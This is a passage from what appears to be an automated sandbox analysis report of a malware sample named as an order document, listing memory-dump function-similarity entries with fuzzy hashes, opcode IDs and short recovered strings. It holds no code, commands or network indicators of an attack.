                                          • Instruction Fuzzy Hash: 28417F30B106148FCB84EB68C894A6EB7BBEFC9700F504529D416AB394DF749D46CBB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: de08a132c2fa424504ee2b8e7b68393e95af11b07dd76c2e5a1fc82e6b5d468c
                                          • Instruction ID: 485c0c1e8a701760592ce971cf0ececad06ac4c0a97460999e6b00bc9bd14d6b
                                          • Opcode Fuzzy Hash: de08a132c2fa424504ee2b8e7b68393e95af11b07dd76c2e5a1fc82e6b5d468c
                                          • Instruction Fuzzy Hash: D8416A757006109FC7489B69C858F6A7BEAAFCC711F1141A9E60A8F3A1DB71EC42CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJcq
                                          • API String ID: 0-1911830065
                                          • Opcode ID: c8650725a88dca9fa1ce30ccecee1b06fd4b0b2104f6e70e8b5cf0e6e02747e6
                                          • Instruction ID: 6947ada965d5e3e491e3deec172bf1e5d29128d87a558e254003a14bac2c4eb1
                                          • Opcode Fuzzy Hash: c8650725a88dca9fa1ce30ccecee1b06fd4b0b2104f6e70e8b5cf0e6e02747e6
                                          • Instruction Fuzzy Hash: 16510874D21208EFDF54DFA9D484AADBBB6FF88300F20816AE815A3350DB345A41DF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <
                                          • API String ID: 0-4251816714
                                          • Opcode ID: 96d796859758981803db407276b7d6a699e594d373a14a1a1f3dff1bbb02ad44
                                          • Instruction ID: 74ef0a15285fa05049971eeb55f426b9239cff448a29dea0ac63386d5b6fff03
                                          • Opcode Fuzzy Hash: 96d796859758981803db407276b7d6a699e594d373a14a1a1f3dff1bbb02ad44
                                          • Instruction Fuzzy Hash: FF51C374D05268CFEBA0DF59D884BE9BBB1AB49304F0090E6C50EB7650CB754AC5CF65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJcq
                                          • API String ID: 0-1911830065
                                          • Opcode ID: bc2bd992d2e5fac14753d6bbaca6eb5409e797264f38ed0fcbc19d006605ce98
                                          • Instruction ID: 6353b4b0ca68fab15b5dadf597bbcc9bd0e169b1dc8b43940d660cdd513acce7
                                          • Opcode Fuzzy Hash: bc2bd992d2e5fac14753d6bbaca6eb5409e797264f38ed0fcbc19d006605ce98
                                          • Instruction Fuzzy Hash: 6551B374D21208EFDB54DFA9E488AADBBB6FF88310F10816AE815A7350DB345A45DF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: 93104e49824cade2a49af7c6cf30a6c3f6b50c5293c23f8b174b5a6940eb3dcd
                                          • Instruction ID: 3a9dc999bdc213d23dfd00629721f82c6130785ef2d7ee9b0cbe80d4f5d56d18
                                          • Opcode Fuzzy Hash: 93104e49824cade2a49af7c6cf30a6c3f6b50c5293c23f8b174b5a6940eb3dcd
                                          • Instruction Fuzzy Hash: EC3139717006109FD348DB29C894B2A77EAEFCC715F114568E60A8B3A1DF75EC42CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: ce9a567def4dc8da09fc89e0a193702a2c4a007a65a7e5ca1f1b7751b57422f0
                                          • Instruction ID: e7ef4228c1dcbf7041414130b886c5215fccaf6e19540f9c0192f6d1ad7938dd
                                          • Opcode Fuzzy Hash: ce9a567def4dc8da09fc89e0a193702a2c4a007a65a7e5ca1f1b7751b57422f0
                                          • Instruction Fuzzy Hash: 52417274E05228CFEBA8CF98CC94BEDB7B1AB88301F4485AAD509A7351DA745E84CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: eb3c619586da91660d71ad3dff94da8971aa8c3e22139dd424fc808766df4066
                                          • Instruction ID: 9922a51ba6e3bba247d1ae25e9e74f29bbf4e3dfce5900dc5b2369a40735d447
                                          • Opcode Fuzzy Hash: eb3c619586da91660d71ad3dff94da8971aa8c3e22139dd424fc808766df4066
                                          • Instruction Fuzzy Hash: 75419474E05228CFEBA8CF98CC94BEDB7B1AB88301F4485AAD509A7351DB745E84CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: 2e0713d1b1421065fbbb1128d481bfdd4c1255cc6d05a1b026d64e6091a7d1ed
                                          • Instruction ID: 117ce0777dcad87b5df8f68216beb60549bd3f84cb69a66adb1f8fb308ca3dda
                                          • Opcode Fuzzy Hash: 2e0713d1b1421065fbbb1128d481bfdd4c1255cc6d05a1b026d64e6091a7d1ed
                                          • Instruction Fuzzy Hash: 3A21B970F106145BDB58AB64C85466EBBA7EFC9701F144029D406EB3D4DF749D06CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: d9c1ddcd8c036ced92bd838948f5df1f360b64338a49079c859cf89d31e42638
                                          • Instruction ID: a8f4b94414ab06afff1f5c3d11cb0dfe585981a2df896cd922f5b23575c9dd26
                                          • Opcode Fuzzy Hash: d9c1ddcd8c036ced92bd838948f5df1f360b64338a49079c859cf89d31e42638
                                          • Instruction Fuzzy Hash: 23319A30D04349EFEB55DFA9E8086FEBBB1EF89301F10806AD151AB291DB745A85CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          • Opcode ID: c72df0ef711ecc22a28ea1287dbeedeef9ed97ef6aaedf65c1cd0fb963afab0c
                                          • Instruction ID: 3290c0ebf6f8ccd6ef55055c8076d8ced4bec3dd5a3bec7f80c66d15571f9898
                                          • Opcode Fuzzy Hash: c72df0ef711ecc22a28ea1287dbeedeef9ed97ef6aaedf65c1cd0fb963afab0c
                                          • Instruction Fuzzy Hash: F121B0717042489FDB41CF2AC844AAA3BE6BF8E350B5940A2FD54CF2B1D631DC50CB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          • Opcode ID: 087b8bd5c172cbaacd35bdd67ea7a40e0703801246e541f173470c280795b9be
                                          • Instruction ID: 8f543f11e0ca57d783cfdfbdeb19c42372dfa01ddc2310a2a9d8ec4803b7144b
                                          • Opcode Fuzzy Hash: 087b8bd5c172cbaacd35bdd67ea7a40e0703801246e541f173470c280795b9be
                                          • Instruction Fuzzy Hash: 5F218E317002489FDB41CF2AC844AAA7BEABF8A350B4940A6FD54CF3A1DA31DC50CB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p`^q
                                          • API String ID: 0-26641872
                                          • Opcode ID: e11c289c7418f2eec5e3402d7d3be03ab866f8fb4ab05ed8d5d9b9eaa8479a8d
                                          • Instruction ID: d4c9ecbbcf0a7486756df1d24aa0d3e1e77a3908d33573ea850cec0f2821fcd5
                                          • Opcode Fuzzy Hash: e11c289c7418f2eec5e3402d7d3be03ab866f8fb4ab05ed8d5d9b9eaa8479a8d
                                          • Instruction Fuzzy Hash: 8021B335E0421ACFCB50DBA8D8809AEFBB4EF45361B14456AE551AB211D730E945C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "
                                          • API String ID: 0-123907689
                                          • Opcode ID: 2e816321756d64f3c5601b607135b89e4877d74456203b297fcb0fdbd254198c
                                          • Instruction ID: 15a85a01ef6fcb5f982cc2dbaa2ae49ba685697a28183a7bf2ed2ccf44be37ac
                                          • Opcode Fuzzy Hash: 2e816321756d64f3c5601b607135b89e4877d74456203b297fcb0fdbd254198c
                                          • Instruction Fuzzy Hash: A6211A78D11228DFDBA4DF68D844B99BBB0FF0A300F1081D5D999A7251C7748A85CF61
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06F5E703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: f4ee9098826105be5f9302582cbc053bc95dcf518c8be1e6a9c78f4ed9183e5b
                                          • Instruction ID: 1281637fc14c68ea4f19b584b9d56f601d5fefb4e6b98f943aee2925e36960fa
                                          • Opcode Fuzzy Hash: f4ee9098826105be5f9302582cbc053bc95dcf518c8be1e6a9c78f4ed9183e5b
                                          • Instruction Fuzzy Hash: DE1134B59003488FCB10DFAAC845ADFFFF5EB88320F20841AD529A7240CB75A944CFA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2567322570
                                          • Opcode ID: 4267a248fbf2c8f0359d97c8708ba76119a02474b9983ad96223e1bebec01510
                                          • Instruction ID: 8261c9bc1952a79cfa0ab6c367e53a33f0ac3e43bfcc1b2af33862e4d5ce4b73
                                          • Opcode Fuzzy Hash: 4267a248fbf2c8f0359d97c8708ba76119a02474b9983ad96223e1bebec01510
                                          • Instruction Fuzzy Hash: B711E674A01218CFCB94DF28E989AED77B1FF49301F5085AAD509AB254DB345E49CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: &
                                          • API String ID: 0-1010288
                                          • Opcode ID: 316ebb064c7e334932386e8f1663d7456b5112c95b38fd58450153b7acbe8133
                                          • Instruction ID: c0b410526ffd48ac24ac539f6ac3308f69456158edb6dfb511823aff61722fc3
                                          • Opcode Fuzzy Hash: 316ebb064c7e334932386e8f1663d7456b5112c95b38fd58450153b7acbe8133
                                          • Instruction Fuzzy Hash: 2D11C974A02208CFCB94EFA8E995AAD77F2EF48300F508959D01A9B391EB349D46CF41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *
                                          • API String ID: 0-163128923
                                          • Opcode ID: e9c6e4d9a03f2f436b5d61dfac20d077b15ababce402ae35b15d73e32573c3e7
                                          • Instruction ID: 355a06dc007d6efe9e0cece17603666cf49e52e7b1a1dd51fb67cf25760c46f8
                                          • Opcode Fuzzy Hash: e9c6e4d9a03f2f436b5d61dfac20d077b15ababce402ae35b15d73e32573c3e7
                                          • Instruction Fuzzy Hash: CA115E70A0412ACFCB649F58DC98BE977B1AB85341F0401E9D02A9B6C1EB345E848F52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: bcbfe9552807f32c2a1b350f0f61cbf96970d551931ede7f6257c8da82093743
                                          • Instruction ID: cf2c5e548603db354a4683ca10997df6c425db92d3e0d16553f6cdd82a61112c
                                          • Opcode Fuzzy Hash: bcbfe9552807f32c2a1b350f0f61cbf96970d551931ede7f6257c8da82093743
                                          • Instruction Fuzzy Hash: 68115D74914228CFEB61CF64CC58BDABBB1AB49304F1081D9D50DA3650DB325E81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2567322570
                                          • Opcode ID: a7c5a321cefc6f6c6f59fe71756a526dcde3b31112ee902061a06503add09002
                                          • Instruction ID: dcbb70de99eb0dce5dfcd75ea9da8956231c8e391002b7f2ebfb64ce01103d0f
                                          • Opcode Fuzzy Hash: a7c5a321cefc6f6c6f59fe71756a526dcde3b31112ee902061a06503add09002
                                          • Instruction Fuzzy Hash: 0001F674601214CFCBA4EF28E899BE977F1EB48301F1084AAE40A9B390DA345E45CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 351e3b8a5345d7d2265fde99a2a9e93b599e877e5bdd41b48a8a384e7b3eaf7f
                                          • Instruction ID: fb8dfdaa5a94df012f92f3a079939245820c9d19bf2e28266fb666ecd0d5eaf5
                                          • Opcode Fuzzy Hash: 351e3b8a5345d7d2265fde99a2a9e93b599e877e5bdd41b48a8a384e7b3eaf7f
                                          • Instruction Fuzzy Hash: 9D013774B02214CFC794EF28ED59BAA77F2EF89200F00C8A594499B345EA74AE40CF81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !
                                          • API String ID: 0-2657877971
                                          • Opcode ID: 3f344ac351ff85bd42265c6720100adadd751c05368d9b035f5c1d9adbb01ffa
                                          • Instruction ID: 52faca74961407184ddafbe00fd554333fb8795ea32be5ccd0c61284ef104d3b
                                          • Opcode Fuzzy Hash: 3f344ac351ff85bd42265c6720100adadd751c05368d9b035f5c1d9adbb01ffa
                                          • Instruction Fuzzy Hash: 0401B274906218CFEB60DF58D998BA9BBBABB08300F1041D6D648A7680D3389E84CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x
                                          • API String ID: 0-2363233923
                                          • Opcode ID: 081268d0b261d84df6f112a536348fd4ded7c54673de4590a321c47cf3f20425
                                          • Instruction ID: 871a7f0cebdd93d715b7b00bdbd2aa602a0def7a2e2023fd736d46700686d38c
                                          • Opcode Fuzzy Hash: 081268d0b261d84df6f112a536348fd4ded7c54673de4590a321c47cf3f20425
                                          • Instruction Fuzzy Hash: E6F0E574D49248AFCB41CFA4C5446ACBBB0EF0A304F14C1DBC82C8B342CB314A06DB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )
                                          • API String ID: 0-2427484129
                                          • Opcode ID: f794fcaebc1e225d53f79b5531eda8ba31ac7ead43e7e0a5c859b3e1b4c30040
                                          • Instruction ID: 0e4bc0b5140c67b688497eb5fed5a1351d72a79104a11e21f4bc8a3cceaec2fe
                                          • Opcode Fuzzy Hash: f794fcaebc1e225d53f79b5531eda8ba31ac7ead43e7e0a5c859b3e1b4c30040
                                          • Instruction Fuzzy Hash: 7BF05B74A11269DFEBA1DF54DC98B9DBBB1BB09304F00819ADA09A6690DB745A81CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C
                                          • API String ID: 0-1037565863
                                          • Opcode ID: 107be7ea8e52d2a8667596cf420f8c7db7ef865ccce9a4c24ae7c107c21a3f99
                                          • Instruction ID: ec1e2da7bb8974bdcd065cfab9822bb343c840f93927bac2511e72942a678ed3
                                          • Opcode Fuzzy Hash: 107be7ea8e52d2a8667596cf420f8c7db7ef865ccce9a4c24ae7c107c21a3f99
                                          • Instruction Fuzzy Hash: 79F0AB74D01228CFEBA0CF64DC44B9CBBB1AB08300F00819ADA09A2290CB745A80CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: dfc78a637193edc1dc0ff539f2f3dbc8d5c2ac89105905b6833e281e2158458f
                                          • Instruction ID: 168b52567fd35da63c656373955da27cbdfb3ed5131676e8fd5fb9124a7b640a
                                          • Opcode Fuzzy Hash: dfc78a637193edc1dc0ff539f2f3dbc8d5c2ac89105905b6833e281e2158458f
                                          • Instruction Fuzzy Hash: 9EF0303180060ADBDF119F54C854AD9B772FF94300F10C685E65937650DB30ABD5CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: f267d82774b6d66af0bd7fca327495b9846ca7269556c757e7c66d270a814636
                                          • Instruction ID: 0fe344db4c136489ade43332a284b417975e35840e1b51f528cf18e08b09a974
                                          • Opcode Fuzzy Hash: f267d82774b6d66af0bd7fca327495b9846ca7269556c757e7c66d270a814636
                                          • Instruction Fuzzy Hash: 46F09874E012298FDB64DF68D884B9DB7B2FB94300F1081969509B7344DB345E84CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: -
                                          • API String ID: 0-2547889144
                                          • Opcode ID: 33c6cb15d51c660a2ac86b714ef868e78cd676d3659ff3be2427a7487e0a1f19
                                          • Instruction ID: 08b9a2640d17194fb2f78a0cc0aaecfd8617bb282226a87d644c1393c3828f8a
                                          • Opcode Fuzzy Hash: 33c6cb15d51c660a2ac86b714ef868e78cd676d3659ff3be2427a7487e0a1f19
                                          • Instruction Fuzzy Hash: 23E0BD79918229CFDB10DF20EA48BD8BBB5AB04304F1080AAC00AA3291C7344A85CF10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: eadc65ff6a1b89da5f170acc7e7c03647000e80d082a6f41fa31e8aa8a79f483
                                          • Instruction ID: ede0d389bca97fb09b593ffe26c3caf0279e2cecc90f44f16fe1122ee86ee79d
                                          • Opcode Fuzzy Hash: eadc65ff6a1b89da5f170acc7e7c03647000e80d082a6f41fa31e8aa8a79f483
                                          • Instruction Fuzzy Hash: B4E0BD39924228CFDB21DF20D998BD8BBF1AB08304F0081D68809A3290D7384B85CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b760fb880c1743035f63ce17fd82446d2d12908ae5825e03a85c27eb6c161885
                                          • Instruction ID: cf214faba17cb957d4bcf1ec3a34c6077b108f273eb402ceed47461add730134
                                          • Opcode Fuzzy Hash: b760fb880c1743035f63ce17fd82446d2d12908ae5825e03a85c27eb6c161885
                                          • Instruction Fuzzy Hash: 5E120874A002188FCB54EF64C894A9DB7B2FF89300F5586A8D54AAB355EF30ED85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65387afadf9a3556e8f16e0d9ec7f9834462dd2ebc9adc4d435e92fd5c71274b
                                          • Instruction ID: 4352ac8420f84a7b6b16359b471c4e2a056e1cadd9e8b57152184488aeebe801
                                          • Opcode Fuzzy Hash: 65387afadf9a3556e8f16e0d9ec7f9834462dd2ebc9adc4d435e92fd5c71274b
                                          • Instruction Fuzzy Hash: 86A1F731A046548FCB66CF28C454A2AFBF2FF85311F59855DE496CB792EB34E841CB42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 491f8b42f4eb10152745b58d4777d478c8b24e673b839a4c9ffd19d12a3cde8f
                                          • Instruction ID: 6c38067072cc3e923ef1370ccbe676c4daa922ddf8247af017dd28bee4aa7c6b
                                          • Opcode Fuzzy Hash: 491f8b42f4eb10152745b58d4777d478c8b24e673b839a4c9ffd19d12a3cde8f
                                          • Instruction Fuzzy Hash: E2B10774E04218CFDF94DFA8D5846ADBBB2FB4A701F20882AD445AB344D7349E46DFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8e19464d197e9ffaaa4e27b4efb91508af4423f52c0b30a039a27e6bab90cfc
                                          • Instruction ID: d26bb94992d46091c3374ba87c360541546bd97739c7342578d9a034b97aa6a2
                                          • Opcode Fuzzy Hash: b8e19464d197e9ffaaa4e27b4efb91508af4423f52c0b30a039a27e6bab90cfc
                                          • Instruction Fuzzy Hash: BCA10A74A002188FDB54DF64C894BA9BBB2FF89300F5485A8E54AAB395EF30DD85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e27612bc007edc1bb64ee1b99b833c7b7100c3cdfa58e91cac9e93ae104feff
                                          • Instruction ID: eae36701f9aed963c5b2dbdfc756b8e22780fdfce243fd28edc90991f0f79f8f
                                          • Opcode Fuzzy Hash: 9e27612bc007edc1bb64ee1b99b833c7b7100c3cdfa58e91cac9e93ae104feff
                                          • Instruction Fuzzy Hash: 47A15831E006698FDB51CFA5D894AFDBBB6FF48780F148018EC12AA395D7389946CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca50c21396d4b3fc1bd79abd05bf067e70a55414436164d30270302e83540bac
                                          • Instruction ID: 037cb813319630d0be418c4fd181dc4800ff2be2a6f3fafdeaacb06c85d98e67
                                          • Opcode Fuzzy Hash: ca50c21396d4b3fc1bd79abd05bf067e70a55414436164d30270302e83540bac
                                          • Instruction Fuzzy Hash: 22815A30B10614DFDB54DF68C894A6DBBB6EF89700F1441A9E906DB3A1DB30ED02CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
